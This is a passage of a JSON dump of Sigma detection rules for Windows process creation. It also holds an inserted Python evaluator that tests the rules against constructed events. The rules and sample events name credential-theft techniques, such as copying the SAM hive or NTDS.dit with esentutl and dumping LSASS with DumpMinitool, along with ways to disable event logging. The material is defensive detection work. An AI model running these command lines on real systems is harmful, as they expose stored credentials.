    "content": "title: Binary Proxy Execution Via Dotnet-Trace.EXE\nid: 9257c05b-4a4a-48e5-a670-b7b073cf401b\nstatus: test\ndescription: Detects commandline arguments for executing a child process via dotnet-trace.exe\nreferences:\n    - https://twitter.com/bohops/status/1740022869198037480\nauthor: Jimmy Bayne (@bohops)\ndate: 2024-01-02\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dotnet-trace.exe'\n        - OriginalFileName: 'dotnet-trace.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-- '\n            - 'collect'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the utility in order to debug and trace a program.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dotnetdump_memory_dump.yml",
    "content": "title: Process Memory Dump Via Dotnet-Dump\nid: 53d8d3e1-ca33-4012-adf3-e05a4d652e34\nstatus: test\ndescription: |\n    Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS.\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect\n    - https://twitter.com/bohops/status/1635288066909966338\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dotnet-dump.exe'\n        - OriginalFileName: 'dotnet-dump.dll'\n    selection_cli:\n        CommandLine|contains: 'collect'\n    condition: all of selection_*\nfalsepositives:\n    - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_driverquery_recon.yml",
    "content": "title: Potential Recon Activity Using DriverQuery.EXE\nid: 9fc3072c-dc8f-4bf7-b231-18950000fadd\nrelated:\n    - id: a20def93-0709-4eae-9bd2-31206e21e6b2\n      type: similar\nstatus: test\ndescription: Detects usage of the \"driverquery\" utility to perform reconnaissance on installed drivers when it is spawned by a script host (cscript, wscript, mshta, regsvr32, rundll32) or by a process running from a user-writable directory\nreferences:\n    - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\n    - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/\n    - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-19\nmodified: 2023-09-29\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: 'driverquery.exe'\n        - OriginalFileName: 'drvqry.exe'\n    selection_parent:\n        - ParentImage|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - ParentImage|contains:\n              - '\\AppData\\Local\\'\n              - '\\Users\\Public\\'\n              - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage by some scripts might trigger this as well\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_driverquery_usage.yml",
    "content": "title: DriverQuery.EXE Execution\nid: a20def93-0709-4eae-9bd2-31206e21e6b2\nrelated:\n    - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd\n      type: similar\nstatus: test\ndescription: Detects usage of the \"driverquery\" utility, which can be used to perform reconnaissance on installed drivers\nreferences:\n    - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\n    - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/\n    - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-19\nmodified: 2023-09-29\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: 'driverquery.exe'\n        - OriginalFileName: 'drvqry.exe'\n    filter_main_other: # These are covered in 9fc3072c-dc8f-4bf7-b231-18950000fadd to avoid duplicate alerting\n        - ParentImage|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - ParentImage|contains:\n              - '\\AppData\\Local\\'\n              - '\\Users\\Public\\'\n              - '\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use by third party tools in order to investigate installed drivers\nlevel: medium # Level could be reduced to low if this utility is often used in your environment\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml",
    "content": "title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE\nid: 01c42d3c-242d-4655-85b2-34f1739632f7\nstatus: test\ndescription: Detects usage of Dsacls to grant overly permissive permissions on directory objects\nreferences:\n    - https://ss64.com/nt/dsacls.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dsacls.exe'\n        - OriginalFileName: \"DSACLS.EXE\"\n    selection_flag:\n        CommandLine|contains: ' /G '\n    selection_permissions:\n        CommandLine|contains: # Add more permissions as you see fit in your environment\n            - 'GR'\n            - 'GE'\n            - 'GW'\n            - 'GA'\n            - 'WP'\n            - 'WD'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrators granting over permissive permissions to users\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml",
    "content": "title: Potential Password Spraying Attempt Using Dsacls.EXE\nid: bac9fb54-2da7-44e9-988f-11e9a5edbc0c\nstatus: test\ndescription: Detects possible password spraying attempts using Dsacls\nreferences:\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone\n    - https://ss64.com/nt/dsacls.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dsacls.exe'\n        - OriginalFileName: \"DSACLS.EXE\"\n    selection_cli:\n        CommandLine|contains|all:\n            - '/user:'\n            - '/passwd:'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use of dsacls to bind to an LDAP session\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml",
    "content": "title: Domain Trust Discovery Via Dsquery\nid: 3bad990e-4848-4a78-9530-b427d854aac0\nrelated:\n    - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b\n      type: similar\n    - id: 77815820-246c-47b8-9741-e0def3f57308\n      type: obsolete\nstatus: test\ndescription: Detects execution of \"dsquery.exe\" for domain trust discovery\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md\n    - https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843\nauthor: E.M. Anhaus, Tony Lambert, oscd.community, omkar72\ndate: 2019-10-24\nmodified: 2023-02-02\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dsquery.exe'\n        - OriginalFileName: 'dsquery.exe'\n    selection_cli:\n        CommandLine|contains: 'trustedDomain'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the utilities by legitimate user for legitimate reason\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - Discover domain trusts with dsquery\n      technique: T1482\n      atomic_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml",
    "content": "title: Suspicious Kernel Dump Using Dtrace\nid: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795\nstatus: test\ndescription: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1\nreferences:\n    - https://twitter.com/0gtweet/status/1474899714290208777?s=12\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-28\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_plain:\n        Image|endswith: '\\dtrace.exe'\n        CommandLine|contains: 'lkd(0)'\n    selection_obfuscated:\n        CommandLine|contains|all:\n            - 'syscall:::return'\n            - 'lkd('\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dump64_defender_av_bypass_rename.yml",
    "content": "title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename\nid: 129966c9-de17-4334-a123-8b58172e664d\nstatus: test\ndescription: |\n    Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.\n    Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.\nreferences:\n    - https://twitter.com/mrd0x/status/1460597833917251595\nauthor: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-26\nmodified: 2024-06-21\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_dump:\n        Image|startswith: ':\\Program Files'\n        Image|contains: '\\Microsoft Visual Studio\\'\n        Image|endswith: '\\dump64.exe'\n    selection_tools_procdump:\n        - OriginalFileName: 'procdump'\n        - CommandLine|contains:\n              - ' -ma ' # Full Dump\n              - ' -mp ' # Mini Plus\n    condition: selection_dump and 1 of selection_tools_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml",
    "content": "title: DumpMinitool Execution\nid: dee0a7a3-f200-4112-a99b-952196d81e42\nstatus: test\ndescription: Detects the use of \"DumpMinitool.exe\", a tool that can dump process memory via the \"MiniDumpWriteDump\" API\nreferences:\n    - https://twitter.com/mrd0x/status/1511415432888131586\n    - https://twitter.com/mrd0x/status/1511489821247684615\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/\n    - https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-04-06\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\DumpMinitool.exe'\n              - '\\DumpMinitool.x86.exe'\n              - '\\DumpMinitool.arm64.exe'\n        - OriginalFileName:\n              - 'DumpMinitool.exe'\n              - 'DumpMinitool.x86.exe'\n              - 'DumpMinitool.arm64.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' Full'\n            - ' Mini'\n            - ' WithHeap'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml",
    "content": "title: Suspicious DumpMinitool Execution\nid: eb1c4225-1c23-4241-8dd4-051389fde4ce\nstatus: test\ndescription: Detects suspicious ways to use the \"DumpMinitool.exe\" binary\nreferences:\n    - https://twitter.com/mrd0x/status/1511415432888131586\n    - https://twitter.com/mrd0x/status/1511489821247684615\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-06\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1036\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\DumpMinitool.exe'\n              - '\\DumpMinitool.x86.exe'\n              - '\\DumpMinitool.arm64.exe'\n        - OriginalFileName:\n              - 'DumpMinitool.exe'\n              - 'DumpMinitool.x86.exe'\n              - 'DumpMinitool.arm64.exe'\n    filter_folder:\n        Image|contains:\n            - '\\Microsoft Visual Studio\\'\n            - '\\Extensions\\'  # https://github.com/microsoft/vstest/blob/b2e2126f1aa7e5753cafe9515563c99ade6a59ce/src/package/nuspec/Microsoft.TestPlatform.Portable.nuspec#L159\n    susp_flags:\n        CommandLine|contains: '.txt'\n    cmd_has_flags:\n        CommandLine|contains:\n            - ' Full'\n            - ' Mini'\n            - ' WithHeap'\n    filter_cmd_misses_flags:\n        CommandLine|contains: '--dumpType'\n    condition: selection and ( ( not filter_folder ) or susp_flags or ( cmd_has_flags and not filter_cmd_misses_flags ) )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dxcap_arbitrary_binary_execution.yml",
    "content": "title: New Capture Session Launched Via DXCap.EXE\nid: 60f16a96-db70-42eb-8f76-16763e333590\nstatus: test\ndescription: |\n    Detects the execution of \"DXCap.EXE\" with the \"-c\" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/\n    - https://twitter.com/harr0ey/status/992008180904419328\nauthor: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-26\nmodified: 2022-06-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\DXCap.exe'\n        - OriginalFileName: 'DXCap.exe'\n    selection_cli:\n        CommandLine|contains: ' -c ' # The \".exe\" is not required to run the binary\n    condition: all of selection*\nfalsepositives:\n    - Legitimate execution of dxcap.exe by legitimate user\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_esentutl_params.yml",
    "content": "title: Esentutl Gather Credentials\nid: 7df1713a-1a5b-4a4b-a071-dc83b144a101\nstatus: test\ndescription: Detects esentutl being run with the \"/p\" (repair) switch. Conti recommended to its affiliates that they use esentutl to access a dumped NTDS file, and Trickbot uses the same utility to obtain Microsoft Edge data via its pwgrab module.\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816\n    - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/\nauthor: sam0x90\ndate: 2021-08-06\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1003.003\n    - attack.s0404\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'esentutl'\n            - ' /p'\n    condition: selection\nfalsepositives:\n    - To be determined\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml",
    "content": "title: Copying Sensitive Files with Credential Data\nid: e7be6119-fc37-43f0-ad4f-1f3f99be2f9f\nstatus: test\ndescription: Detects copying of files with well-known filenames that contain credential data (the SAM, SECURITY and SYSTEM registry hives and NTDS.dit), for example via esentutl.exe with the /vss, /m or /y switches\nreferences:\n    - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml\nauthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-22\nmodified: 2024-06-04\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.003\n    - car.2013-07-001\n    - attack.s0404\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_esent_img:\n        - Image|endswith: '\\esentutl.exe'\n        - OriginalFileName: 'esentutl.exe'\n    selection_esent_cli:\n        CommandLine|contains|windash:\n            - 'vss'\n            - ' /m '\n            - ' /y '\n    selection_susp_paths:\n        CommandLine|contains:\n            - '\\config\\RegBack\\sam'\n            - '\\config\\RegBack\\security'\n            - '\\config\\RegBack\\system'\n            - '\\config\\sam'\n            - '\\config\\security'\n            - '\\config\\system '        # space needed to avoid false positives with \\config\\systemprofile\\\n            - '\\repair\\sam'\n            - '\\repair\\security'\n            - '\\repair\\system'\n            - '\\windows\\ntds\\ntds.dit'\n    condition: all of selection_esent_* or selection_susp_paths\nfalsepositives:\n    - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.\nlevel: high\n"
  },
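Three of the rules above lean on Sigma matching details that are easy to get wrong when porting them to a SIEM: the dllhost rule keeps an explicit `CommandLine: null` filter, the esentutl copy rule relies on the `windash` modifier and on the trailing space in `'\config\system '` to avoid `\config\systemprofile\`, and the suspicious DumpMinitool rule combines four selections in one condition. The following is an added example, not SigmaHQ or pySigma code: a minimal evaluator for just the modifiers these rules use, run against constructed process_creation events. The dash set for `windash`, the abbreviated esentutl path list and the event contents are assumptions.

```python
"""Mini evaluator for the Sigma process_creation selections shown above (added example,
not SigmaHQ/pySigma code). It implements only the modifiers these rules use (exact/list,
endswith, contains, |all, |windash) and the 'Field: null' check. Use sigma-cli for real work."""
import re
from itertools import product

# windash: each '-' or '/' in a pattern also matches the other character and the
# Unicode dashes Windows command-line parsers accept (assumed set, per the Sigma spec).
DASHES = ("-", "/", "\u2013", "\u2014", "\u2015")

def expand(value, windash):
    """Rule value -> pattern list; with windash every '-' or '/' becomes each DASHES variant."""
    vals = value if isinstance(value, list) else [value]
    if not windash:
        return vals
    out = []
    for v in vals:
        parts = re.split(r"([-/])", v)           # odd indices are the dash slots
        for combo in product(DASHES, repeat=len(parts) // 2):
            parts[1::2] = combo
            out.append("".join(parts))
    return out

def field_matches(event, key, value):
    """One 'Field|mod|...: value' line. Sigma string matching is case-insensitive."""
    field, *mods = key.split("|")
    actual = event.get(field)
    if value is None:                            # 'Field: null' holds when the field is absent
        return actual is None
    if actual is None:
        return False
    actual = actual.lower()
    pats = [p.lower() for p in expand(value, "windash" in mods)]
    if "endswith" in mods:
        hits = [actual.endswith(p) for p in pats]
    elif "contains" in mods:
        hits = [p in actual for p in pats]
    else:
        hits = [actual == p for p in pats]
    return all(hits) if "all" in mods else any(hits)

def selection_matches(event, sel):
    """A map is AND over its fields; a list of maps is OR over its items."""
    if isinstance(sel, list):
        return any(selection_matches(event, s) for s in sel)
    return all(field_matches(event, k, v) for k, v in sel.items())

def one_of(r, prefix):
    return any(v for k, v in r.items() if k.startswith(prefix))
def all_of(r, prefix):
    return all(v for k, v in r.items() if k.startswith(prefix))

def evaluate(rule, event):
    """Evaluate every named selection, then apply the rule's condition to the results."""
    r = {name: selection_matches(event, sel) for name, sel in rule["detection"].items()}
    return bool(rule["condition"](r))

# Selections and conditions transcribed from the YAML above (esentutl path list abbreviated).
DLLHOST_ANOMALY = {
    "detection": {"selection": {"Image|endswith": "\\dllhost.exe", "CommandLine": ["dllhost.exe", "dllhost"]},
                  "filter_main_null": {"CommandLine": None}},
    "condition": lambda r: r["selection"] and not one_of(r, "filter_main_"),
}
ESENTUTL_SENSITIVE_COPY = {
    "detection": {"selection_esent_img": [{"Image|endswith": "\\esentutl.exe"}, {"OriginalFileName": "esentutl.exe"}],
                  "selection_esent_cli": {"CommandLine|contains|windash": ["vss", " /m ", " /y "]},
                  "selection_susp_paths": {"CommandLine|contains": ["\\config\\sam", "\\config\\system ", "\\windows\\ntds\\ntds.dit"]}},
    "condition": lambda r: all_of(r, "selection_esent_") or r["selection_susp_paths"],
}
DUMPMINITOOL_SUSP = {
    "detection": {"selection": [{"Image|endswith": ["\\DumpMinitool.exe", "\\DumpMinitool.x86.exe", "\\DumpMinitool.arm64.exe"]},
                                {"OriginalFileName": ["DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"]}],
                  "filter_folder": {"Image|contains": ["\\Microsoft Visual Studio\\", "\\Extensions\\"]},
                  "susp_flags": {"CommandLine|contains": ".txt"},
                  "cmd_has_flags": {"CommandLine|contains": [" Full", " Mini", " WithHeap"]},
                  "filter_cmd_misses_flags": {"CommandLine|contains": "--dumpType"}},
    "condition": lambda r: r["selection"] and (not r["filter_folder"] or r["susp_flags"]
                                               or (r["cmd_has_flags"] and not r["filter_cmd_misses_flags"])),
}
SYS32 = "C:\\Windows\\System32\\"
VS_DUMP = "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\DumpMinitool.exe"
EVENTS = {  # constructed process_creation events, not real telemetry
    "dllhost_bare": {"Image": SYS32 + "dllhost.exe", "CommandLine": "dllhost.exe"},
    "dllhost_com": {"Image": SYS32 + "dllhost.exe", "CommandLine": "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}"},
    "dllhost_nocli": {"Image": SYS32 + "dllhost.exe"},  # e.g. 4688 without command-line auditing
    "esentutl_sam": {"Image": SYS32 + "esentutl.exe", "CommandLine": "esentutl.exe /y /vss C:\\Windows\\System32\\config\\SAM /d C:\\Users\\Public\\sam.bak"},
    "esentutl_dash": {"Image": SYS32 + "esentutl.exe", "CommandLine": "esentutl.exe -y C:\\temp\\db.edb -d C:\\temp\\copy.edb"},
    "esentutl_profile": {"Image": SYS32 + "esentutl.exe", "CommandLine": "esentutl.exe /r V01 /l C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\WebCache"},
    "dump_vs_ok": {"Image": VS_DUMP, "CommandLine": "DumpMinitool.exe --file out.dmp --processId 4321 --dumpType Full"},
    "dump_vs_txt": {"Image": VS_DUMP, "CommandLine": "DumpMinitool.exe --file lsass.txt --processId 648 --dumpType Full"},
    "dump_vs_noflag": {"Image": VS_DUMP, "CommandLine": "DumpMinitool.exe --file out.dmp --processId 648 Full"},
    "dump_public": {"Image": "C:\\Users\\Public\\DumpMinitool.exe", "CommandLine": "DumpMinitool.exe --file d.dmp --processId 648 --dumpType Full"},
}
RULES = {"dllhost": DLLHOST_ANOMALY, "esentutl": ESENTUTL_SENSITIVE_COPY, "dumpminitool": DUMPMINITOOL_SUSP}

def run_all():
    """Return {rule: {event: matched}} for every constructed event."""
    return {rn: {en: evaluate(rule, ev) for en, ev in EVENTS.items()} for rn, rule in RULES.items()}
```

Points worth noticing when running it: `esentutl_dash` only fires because `windash` turns `' /y '` into `' -y '` as well; `esentutl_profile` stays silent solely because of the trailing space in `'\config\system '`; and for `dllhost_nocli` the `filter_main_null` selection is true while the exact-match selection is already false, which is why the rule carries that filter as a guard for backends whose handling of absent fields differs from the reference semantics. The three DumpMinitool cases exercise each branch of that rule's condition (non-Visual-Studio path, `.txt` target, flag word without `--dumpType`).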
  {
    "path": "rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml",
    "content": "title: Esentutl Steals Browser Information\nid: 6a69f62d-ce75-4b57-8dce-6351eb55b362\nstatus: test\ndescription: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe\nreferences:\n    - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n    - https://redcanary.com/threat-detection-report/threats/qbot/\n    - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\nauthor: frack113\ndate: 2022-02-13\nmodified: 2024-03-05\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\esentutl.exe'\n        - OriginalFileName: 'esentutl.exe'\n    selection_flag:\n        CommandLine|contains|windash: '-r'\n    selection_webcache:\n        CommandLine|contains: '\\Windows\\WebCache'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_event_logging_disable_via_key_minint.yml",
    "content": "title: Security Event Logging Disabled via MiniNt Registry Key - Process\nid: 1a4bd6af-99ac-4466-b5b2-7b72b4a05462\nrelated:\n    - id: 8839e550-52d7-4958-9f2f-e13c1e736838 # Disable Security Events Logging Adding Reg Key MiniNt - Registry Set\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable security event logging by adding the `MiniNt` registry key.\n    This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.\n    Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.\nreferences:\n    - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.002\n    - attack.t1112\n    - car.2022-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg_img:\n        # Example: reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt\"\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_cmd:\n        CommandLine|contains|all:\n            - ' add '\n            - '\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n    selection_powershell_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\powershell_ise.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_powershell_cmd1:\n        CommandLine|contains:\n            - 'New-Item '\n            - 'ni '\n    selection_powershell_cmd2:\n        CommandLine|contains: '\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n    condition: all of selection_reg_* or all of selection_powershell_*\nfalsepositives:\n    - Highly Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml",
    "content": "title: Potentially Suspicious Event Viewer Child Process\nid: be344333-921d-4c4d-8bb8-e584cf584780\nrelated:\n    - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6\n      type: derived\nstatus: test\ndescription: Detects uncommon or suspicious child processes of \"eventvwr.exe\" which might indicate a UAC bypass attempt\nreferences:\n    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n    - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2023-09-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\eventvwr.exe'\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\System32\\mmc.exe'\n            - ':\\Windows\\System32\\WerFault.exe'\n            - ':\\Windows\\SysWOW64\\WerFault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml",
    "content": "title: Potentially Suspicious Cabinet File Expansion\nid: 9f107a84-532c-41af-b005-8d12a607639f\nstatus: test\ndescription: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks\nreferences:\n    - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll\n    - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/\nauthor: Bhabesh Raj, X__Junior (Nextron Systems)\ndate: 2021-07-30\nmodified: 2024-11-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        Image|endswith: '\\expand.exe'\n        CommandLine|contains|windash: '-F:'\n    selection_folders_1:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\ProgramData'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Admin$\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\C$\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - 